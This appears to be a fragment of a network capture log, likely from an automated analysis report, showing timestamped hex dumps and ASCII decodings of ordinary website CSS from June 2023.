                                                                                                                                                                        Data Ascii: -color:#f0f3f5;border-right-color:var(--grey-hair)}#atomic .Bdendc\(--hulk-pants\){border-right-color:#7e1fff;border-right-color:var(--hulk-pants)}#atomic .Bdendc\(--pebble\){border-right-color:#c7cdd2;border-right-color:var(--pebble)}#atomic .Bdendc\(--w
                                                                                                                                                                        2023-06-02 11:13:21 UTC31INData Raw: 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 77 5c 28 31 70 78 5c 29 2c 2e 42 64 45 6e 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 77 5c 28 37 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 77 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 62 77 5c 28 30 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 42 64 62 77 5c 28 30 5c 29 5c 3a 6c 63 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 42 64 62 77 5c 28 30 5c 29 5c 21 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d
                                                                                                                                                                        Data Ascii: #atomic .Bdendw\(1px\),.BdEnd{border-right-width:1px}#atomic .Bdendw\(7px\){border-right-width:7px}#atomic .Bdendw\(8px\){border-right-width:8px}#atomic .Bdbw\(0\),#atomic .Bdbw\(0\)\:lc:last-child{border-bottom-width:0}#atomic .Bdbw\(0\)\!{border-bottom-
                                                                                                                                                                        2023-06-02 11:13:21 UTC32INData Raw: 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 74 65 6e 64 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 65 6e 64 5c 28 31 34 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 65 6e 64 5c 28 35 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 62 65 6e 64 5c 28 38 70 78 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 7d 23 61
                                                                                                                                                                        Data Ascii: ){border-top-right-radius:5px}#atomic .Bdrstend\(8px\){border-top-right-radius:8px}#atomic .Bdrsbend\(14px\){border-bottom-right-radius:14px}#atomic .Bdrsbend\(5px\){border-bottom-right-radius:5px}#atomic .Bdrsbend\(8px\){border-bottom-right-radius:8px}#a
                                                                                                                                                                        2023-06-02 11:13:21 UTC33INData Raw: 64 49 6e 66 6f 47 72 61 64 69 65 6e 74 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 23 66 66 66 2c 23 65 30 65 34 65 39 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 69 5c 28 66 6c 61 73 68 53 61 6c 65 41 63 74 69 76 65 42 61 63 6b 67 72 6f 75 6e 64 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 23 66 66 63 37 30 30 2c 23 66 66 34 64 35 32 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 69 5c 28 6d 75 74 65 4f 66 66 49 63 6f 6e 42 61 73 65 36 34 49 6d 61 67 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30
                                                                                                                                                                        Data Ascii: dInfoGradient\){background-image:linear-gradient(0deg,#fff,#e0e4e9)}#atomic .Bgi\(flashSaleActiveBackground\){background-image:linear-gradient(90deg,#ffc700,#ff4d52)}#atomic .Bgi\(muteOffIconBase64Image\){background-image:url(data:image/png;base64,iVBORw0
                                                                                                                                                                        2023-06-02 11:13:21 UTC35INData Raw: 55 44 32 4f 2f 41 63 4d 65 7a 4d 38 50 50 78 75 61 57 6b 70 6e 52 76 52 2f 61 58 4f 72 42 6f 2b 54 45 5a 58 51 52 71 30 45 32 42 36 66 67 6f 71 55 55 43 46 6a 41 52 57 72 7a 73 46 36 6c 4b 69 6a 30 36 6f 67 71 56 7a 58 48 33 5a 78 70 59 36 71 45 75 42 57 4a 4b 78 52 71 50 6a 4e 49 46 6d 69 67 70 46 77 42 5a 2f 6d 46 4e 65 67 72 2f 56 64 61 49 42 37 46 4d 38 45 79 32 72 31 30 6f 62 51 65 56 42 4d 41 6e 6d 55 57 77 41 42 31 69 33 73 33 52 6d 39 56 72 32 68 77 6f 79 43 42 34 37 64 31 36 67 6e 41 4e 61 42 72 43 66 4a 38 45 77 49 66 61 42 6f 71 38 6f 6e 53 5a 2f 36 4f 31 7a 34 46 73 77 66 2b 7a 69 57 6a 55 4d 78 62 37 69 5a 34 61 6f 42 32 77 47 54 53 55 72 7a 46 4d 33 55 4e 61 66 55 38 67 70 41 45 2b 4c 39 53 50 39 67 31 55 55 44 56 4f 76 69 50 66 4c 73 45 71
                                                                                                                                                                        Data Ascii: UD2O/AcMezM8PPxuaWkpnRvR/aXOrBo+TEZXQRq0E2B6fgoqUUCFjARWrzsF6lKij06ogqVzXH3ZxpY6qEuBWJKxRqPjNIFmigpFwBZ/mFNegr/VdaIB7FM8Ey2r10obQeVBMAnmUWwAB1i3s3Rm9Vr2hwoyCB47d16gnANaBrCfJ8EwIfaBoq8onSZ/6O1z4Fswf+ziWjUMxb7iZ4aoB2wGTSUrzFM3UNafU8gpAE+L9SP9g1UUDVOviPfLsEq
                                                                                                                                                                        2023-06-02 11:13:21 UTC36INData Raw: 45 34 48 73 46 6d 52 71 53 65 66 36 4b 69 64 51 4a 79 6f 2f 53 58 61 47 48 53 41 43 76 4a 32 55 6d 65 79 56 39 2f 62 54 2f 56 68 77 62 49 7a 63 35 63 34 6e 55 63 35 67 4a 32 56 34 4a 69 41 79 36 49 7a 56 69 78 6a 79 42 2b 69 2f 59 76 34 55 62 53 58 33 64 6e 58 48 45 4f 6e 62 62 44 4d 45 64 30 53 79 65 48 43 70 6d 35 6d 41 6c 50 39 4f 52 31 30 68 4e 55 69 66 79 51 2b 79 4b 4a 77 7a 47 77 52 2b 38 75 78 4f 68 4b 35 32 72 6c 64 52 2f 34 5a 6c 64 32 46 76 33 6c 78 77 6e 65 37 59 53 34 77 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 69 5c 28 6e 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 30 30 30 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                        Data Ascii: E4HsFmRqSef6KidQJyo/SXaGHSACvJ2UmeyV9/bT/VhwbIzc5c4nUc5gJ2V4JiAy6IzVixjyB+i/Yv4UbSX3dnXHEOnbbDMEd0SyeHCpm5mAlP9OR10hNUifyQ+yKJwzGwR+8uxOhK52rldR/4Zld2Fv3lxwne7YS4wAAAAAElFTkSuQmCC)}#atomic .Bgi\(n\){background-image:none}#atomic .Bgc\(\#000\){background-c
                                                                                                                                                                        2023-06-02 11:13:21 UTC37INData Raw: 2d 63 6f 6c 6f 72 3a 23 66 66 33 30 30 38 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 66 66 66 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 66 66 66 5c 2e 31 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 31 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 66 66 66 5c 2e 39 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 39 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 63 2d 61 63 63 65 6e 74 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 33 30 30 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 63 2d
                                                                                                                                                                        Data Ascii: -color:#ff3008}#atomic .Bgc\(\#fff\){background-color:#fff}#atomic .Bgc\(\#fff\.1\){background-color:rgba(255,255,255,.1)}#atomic .Bgc\(\#fff\.9\){background-color:rgba(255,255,255,.9)}#atomic .Bgc\(\$c-accent\){background-color:#7300ff}#atomic .Bgc\(\$c-
                                                                                                                                                                        2023-06-02 11:13:21 UTC37INData Raw: 0a
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        2023-06-02 11:13:21 UTC37INData Raw: 31 34 30 30 30 0d 0a 63 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 66 36 39 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 63 2d 66 75 6a 69 2d 67 72 65 79 2d 6d 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 63 2d 66 75 6a 69 2d 73 74 61 72 66 69 73 68 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 37 35 39 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 68 75 66 66 70 6f 73 74 43 6f 6c 6f 72 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 68 75 66 66 70 6f 73 74 43 6f 6c 6f 72 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                                                                                                        Data Ascii: 14000c\){background-color:#0f69ff}#atomic .Bgc\(\$c-fuji-grey-m\){background-color:#232a31}#atomic .Bgc\(\$c-fuji-starfish\)\:\:b:before{background-color:#7759ff}#atomic .Bgc\(\$huffpostColor\),#atomic .Bgc\(\$huffpostColor\)\:\:b:before{background-colo
                                                                                                                                                                        2023-06-02 11:13:21 UTC39INData Raw: 20 2e 42 67 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 65 31 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 6d 75 6c 61 68 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 63 35 36 37 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6d 75 6c 61 68 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 72 6f 67 65 72 73 2d 72 65 64 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                        Data Ascii: .Bgc\(--hulk-pants\),#atomic .Bgc\(--hulk-pants\)\:\:b:before{background-color:#7e1fff;background-color:var(--hulk-pants)}#atomic .Bgc\(--mulah\){background-color:#1ac567;background-color:var(--mulah)}#atomic .Bgc\(--rogers-red\)\:\:b:before{background-c
                                                                                                                                                                        2023-06-02 11:13:21 UTC40INData Raw: 74 68 61 6e 32 34 68 20 2e 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 6c 65 73 73 74 68 61 6e 32 34 68 5f 42 67 63 5c 28 5c 23 66 66 33 30 30 38 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 33 30 30 38 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 67 7a 5c 28 31 30 30 5c 25 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 7d 23 61 74 6f 6d 69 63 20 2e 42 67 7a 5c 28 36 35 5c 25 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 36 35 25 7d 23 61 74 6f 6d 69 63 20 2e 42 67 7a 5c 28 37 30 70 78 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 37 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 67 7a 5c 28 63 76 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d
                                                                                                                                                                        Data Ascii: than24h .wafer-countdown-lessthan24h_Bgc\(\#ff3008\){background-color:#ff3008!important}#atomic .Bgz\(100\%\){background-size:100%}#atomic .Bgz\(65\%\){background-size:65%}#atomic .Bgz\(70px\){background-size:70px}#atomic .Bgz\(cv\){background-size:cover}
                                                                                                                                                                        2023-06-02 11:13:21 UTC41INData Raw: 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 38 29 2c 30 20 34 70 78 20 38 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 33 29 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 34 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 35 29 2c 30 20 34 70 78 20 31 36 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 34 29 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 6e 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68
                                                                                                                                                                        Data Ascii: hadow:0 0 1px rgba(0,0,0,.08),0 4px 8px rgba(0,0,0,.1);box-shadow:var(--elevation-3)}#atomic .Bxsh\(--elevation-4\){box-shadow:0 0 2px rgba(0,0,0,.05),0 4px 16px rgba(0,0,0,.2);box-shadow:var(--elevation-4)}#atomic .Bxsh\(n\){box-shadow:none}#atomic .Bxsh
                                                                                                                                                                        2023-06-02 11:13:21 UTC42INData Raw: 76 61 72 28 2d 2d 64 6f 72 79 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 30 30 30 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 6d 79 79 61 68 6f 6f 43 5c 29 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 30 66 31 34 31 37 5c 29 7b 63 6f 6c 6f 72 3a 23 30 66 31 34 31 37 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 31 31 64 37 38 34 5c 29 7b 63 6f 6c 6f 72 3a 23 31 31 64 37 38 34 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 31 62 39 35 66 66 5c 29 7b 63 6f 6c 6f 72 3a 23 31 62 39 35 66 66 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 32 32 32 5c 29 7b 63 6f 6c 6f 72 3a 23 32 32 32 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 23 33 32 34 66 65 31 5c 29 7b 63 6f 6c 6f 72 3a 23 33 32 34 66 65
                                                                                                                                                                        Data Ascii: var(--dory)!important}#atomic .C\(\#000\),#atomic .C\(\$myyahooC\){color:#000}#atomic .C\(\#0f1417\){color:#0f1417}#atomic .C\(\#11d784\){color:#11d784}#atomic .C\(\#1b95ff\){color:#1b95ff}#atomic .C\(\#222\){color:#222}#atomic .C\(\#324fe1\){color:#324fe
                                                                                                                                                                        2023-06-02 11:13:21 UTC44INData Raw: 74 65 72 74 61 69 6e 6d 65 6e 74 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 63 61 74 2d 6c 69 66 65 73 74 79 6c 65 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 63 61 74 2d 73 74 79 6c 65 5c 29 7b 63 6f 6c 6f 72 3a 23 63 63 30 30 38 63 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 72 6e 65 79 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6f 6e 73 61 69 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 5c 24 63 61 74 2d 68 65 61 6c 74 68 5c 29 7b 63 6f 6c 6f 72 3a 23 30 30 38 37 33 63 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6f 6e 73 61 69 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 73 68 61 72 6b 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 73 68 61 72 6b 5c 29 5c 3a 5c 3a 61 3a 61 66 74 65 72 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28
                                                                                                                                                                        Data Ascii: tertainment\),#atomic .C\(\$cat-lifestyle\),#atomic .C\(\$cat-style\){color:#cc008c;color:var(--barney)}#atomic .C\(--bonsai\),#atomic .C\(\$cat-health\){color:#00873c;color:var(--bonsai)}#atomic .C\(--shark\),#atomic .C\(--shark\)\:\:a:after,#atomic .C\(
                                                                                                                                                                        2023-06-02 11:13:21 UTC45INData Raw: 7b 63 6f 6c 6f 72 3a 23 30 30 36 33 65 62 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 63 6f 6f 74 65 72 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 73 6b 79 5c 29 7b 63 6f 6c 6f 72 3a 23 31 32 61 39 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 6b 79 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 77 68 69 74 65 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 77 68 69 74 65 5c 29 5c 3a 68 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 69 6e 68 65 72 69 74 5c 29 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6c 75 72 70 6c 65 5c 29 5c 3a 68 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 35 64 35 65 66 66 3b 63 6f
                                                                                                                                                                        Data Ascii: {color:#0063eb;color:var(--scooter)}#atomic .C\(--sky\){color:#12a9ff;color:var(--sky)}#atomic .C\(--white\),#atomic .C\(--white\)\:h:hover{color:#fff;color:var(--white)}#atomic .C\(inherit\){color:inherit}#atomic .C\(--blurple\)\:h:hover{color:#5d5eff;co
                                                                                                                                                                        2023-06-02 11:13:21 UTC46INData Raw: 77 20 2e 67 65 6d 69 6e 69 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 6f 6e 73 2d 73 68 6f 77 5f 44 5c 28 62 5c 29 2c 2e 67 65 6d 69 6e 69 2d 64 72 6f 70 64 6f 77 6e 2d 73 68 6f 77 20 2e 67 65 6d 69 6e 69 2d 64 72 6f 70 64 6f 77 6e 2d 73 68 6f 77 5f 44 5c 28 62 5c 29 2c 2e 68 61 73 2d 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 20 2e 68 61 73 2d 77 61 66 65 72 2d 66 65 74 63 68 2d 65 72 72 6f 72 5f 44 5c 28 62 5c 29 5c 21 2c 2e 6a 73 2d 68 6f 74 73 70 6f 74 2d 6d 6f 64 61 6c 2d 61 63 74 69 76 65 20 2e 6a 73 2d 68 6f 74 73 70 6f 74 2d 6d 6f 64 61 6c 2d 61 63 74 69 76 65 5f 44 5c 28 62 5c 29 2c 2e 6a 73 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 75 6c 6c 2d 73 63 72 65 65 6e 20 2e 6a 73 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 66
                                                                                                                                                                        Data Ascii: w .gemini-dropdown-actions-show_D\(b\),.gemini-dropdown-show .gemini-dropdown-show_D\(b\),.has-wafer-fetch-error .has-wafer-fetch-error_D\(b\)\!,.js-hotspot-modal-active .js-hotspot-modal-active_D\(b\),.js-image-container-full-screen .js-image-container-f
                                                                                                                                                                        2023-06-02 11:13:21 UTC48INData Raw: 30 20 2e 68 69 64 65 2d 61 64 2d 30 5f 44 5c 28 6e 5c 29 2c 2e 68 69 64 65 2d 61 64 2d 31 20 2e 68 69 64 65 2d 61 64 2d 31 5f 44 5c 28 6e 5c 29 2c 2e 68 69 64 65 2d 61 64 2d 32 20 2e 68 69 64 65 2d 61 64 2d 32 5f 44 5c 28 6e 5c 29 2c 2e 68 69 64 65 2d 61 64 2d 33 20 2e 68 69 64 65 2d 61 64 2d 33 5f 44 5c 28 6e 5c 29 2c 2e 68 69 64 65 2d 61 64 2d 34 20 2e 68 69 64 65 2d 61 64 2d 34 5f 44 5c 28 6e 5c 29 2c 2e 6a 73 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 75 6c 6c 2d 73 63 72 65 65 6e 20 2e 6a 73 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 66 75 6c 6c 2d 73 63 72 65 65 6e 5f 44 5c 28 6e 5c 29 2c 2e 6c 69 67 68 74 77 65 69 67 68 74 20 2e 6c 69 67 68 74 77 65 69 67 68 74 5f 44 5c 28 6e 5c 29 2c 2e 6e 67 5f 73 6d 5f 63 6f 6c 6c 61 70 73 65
                                                                                                                                                                        Data Ascii: 0 .hide-ad-0_D\(n\),.hide-ad-1 .hide-ad-1_D\(n\),.hide-ad-2 .hide-ad-2_D\(n\),.hide-ad-3 .hide-ad-3_D\(n\),.hide-ad-4 .hide-ad-4_D\(n\),.js-image-container-full-screen .js-image-container-full-screen_D\(n\),.lightweight .lightweight_D\(n\),.ng_sm_collapse
                                                                                                                                                                        2023-06-02 11:13:21 UTC49INData Raw: 63 6b 2d 31 20 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 31 5f 44 5c 28 66 5c 29 2c 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 32 20 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 32 5f 44 5c 28 66 5c 29 2c 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 33 20 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 33 5f 44 5c 28 66 5c 29 2c 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 34 20 2e 67 69 76 65 2d 66 65 65 64 62 61 63 6b 2d 34 5f 44 5c 28 66 5c 29 2c 2e 73 68 6f 77 6d 6f 72 65 20 2e 73 68 6f 77 6d 6f 72 65 5f 44 5c 28 66 5c 29 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 5c 28 5c 24 76 69 64 65 6f 41 64 49 6e 66 6f 44 72 6f 70 53 68 61 64 6f 77 5c 29 7b 66 69 6c 74 65 72 3a 64 72 6f 70 2d 73
                                                                                                                                                                        Data Ascii: ck-1 .give-feedback-1_D\(f\),.give-feedback-2 .give-feedback-2_D\(f\),.give-feedback-3 .give-feedback-3_D\(f\),.give-feedback-4 .give-feedback-4_D\(f\),.showmore .showmore_D\(f\){display:flex!important}#atomic .Fil\(\$videoAdInfoDropShadow\){filter:drop-s
                                                                                                                                                                        2023-06-02 11:13:21 UTC50INData Raw: 20 2e 46 6c 5c 28 73 74 61 72 74 5c 29 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 23 61 74 6f 6d 69 63 20 2e 46 66 5c 28 5c 24 66 66 2d 70 72 69 6d 61 72 79 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 46 66 5c 28 5c 24 66 66 2d 73 65 63 6f 6e 64 61 72 79 5c 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 61 74 6f 6d 69 63 20 2e 46 66 5c 28 5c 24 6e 65 75 65 42 6f 6c 64 5c 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 20 42 6f 6c 64 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 61 74 6f 6d 69 63 20 2e 46 66 5c 28 5c 24 6e 65 75
                                                                                                                                                                        Data Ascii: .Fl\(start\){float:left}#atomic .Ff\(\$ff-primary\),#atomic .Ff\(\$ff-secondary\){font-family:Helvetica Neue,Helvetica,Arial,sans-serif}#atomic .Ff\(\$neueBold\){font-family:Helvetica Neue Bold,Helvetica Neue,Helvetica,Arial,sans-serif}#atomic .Ff\(\$neu
                                                                                                                                                                        2023-06-02 11:13:21 UTC51INData Raw: 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 37 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 37 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 38 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 39 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 39 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 72 65 6d 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 32 30 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 32 34 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 32 35 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c
                                                                                                                                                                        Data Ascii: tomic .Fz\(17px\){font-size:17px}#atomic .Fz\(18px\){font-size:18px}#atomic .Fz\(19px\){font-size:19px}#atomic .Fz\(1rem\){font-size:1rem}#atomic .Fz\(20px\){font-size:20px}#atomic .Fz\(24px\){font-size:24px}#atomic .Fz\(25px\){font-size:25px}#atomic .Fz\
